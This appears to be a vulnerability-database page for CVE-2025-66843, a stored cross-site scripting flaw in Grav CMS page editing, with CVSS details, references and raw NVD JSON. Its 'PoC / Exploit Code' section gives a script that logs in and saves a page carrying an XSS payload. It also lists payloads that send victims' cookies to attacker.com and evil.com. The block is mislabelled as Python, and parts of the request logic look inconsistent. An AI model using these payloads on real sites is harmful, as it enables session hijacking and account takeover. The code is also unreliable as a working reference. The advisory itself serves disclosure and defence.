CVE-2025-66843

Description

grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE

Grav CMS < v1.7.49.5

所有低于1.7.49.5的grav版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-66843 Stored XSS PoC for Grav CMS
// Author: Security Researcher
// Target: Grav CMS < v1.7.49.5

// Step 1: Authenticate with low-privileged account
const loginUrl = 'https://target-site.com/grav/admin';
const credentials = {
    'username': 'attacker_user',
    'password': 'attacker_password'
};

// Step 2: Create new page with XSS payload
const pageTitle = '<img src=x onerror=fetch(`https://attacker.com/steal?c=${document.cookie}`)>';
const pageContent = '<h1>Injected Content</h1><script>console.log("XSS Executed")</script>';

// Step 3: Payload variations
const payloads = [
    '<svg onload=alert(document.domain)>',
    '<img src=x onerror=document.location="https://evil.com/log?"+document.cookie>',
    '<iframe src="javascript:fetch(\'https://attacker.com?data=\'+btoa(document.cookie))">',
    '<body onload=fetch("https://attacker.com/exfil?cookie="+encodeURIComponent(document.cookie))>'
];

// Step 4: Send malicious page to server
async function exploitGravXSS() {
    // Login request
    const loginResponse = await fetch(loginUrl + '/task:login', {
        method: 'POST',
        credentials: 'include',
        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
        body: new URLSearchParams(credentials)
    });
    
    // Create page with XSS payload
    const createPageUrl = loginUrl + '/task:save';
    const pageData = {
        'page[title]': payloads[0],
        'page[content]': pageContent,
        'page[route]': '/malicious-page',
        'page[template]': 'default'
    };
    
    const saveResponse = await fetch(createPageUrl, {
        method: 'POST',
        credentials: 'include',
        headers: {'Content-Type': 'application/json'},
        body: JSON.stringify(pageData)
    });
    
    return saveResponse.ok;
}

// Step 5: When victim views the page, cookie is stolen automatically
// The stored XSS payload executes in victim's browser context

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66843
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66843
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66843/
[4] VulDB https://vuldb.com/cve/CVE-2025-66843
[5] https://github.com/Yohane-Mashiro/grav_cve/issues/1
[6] https://github.com/Yohane-Mashiro/grav_cve/issues/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66843", "sourceIdentifier": "[email protected]", "published": "2025-12-15T16:15:53.387", "lastModified": "2025-12-17T15:39:29.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.49.5", "matchCriteriaId": "4635A1D7-7801-4263-A58C-17941EE530B4"}]}]}], "references": [{"url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}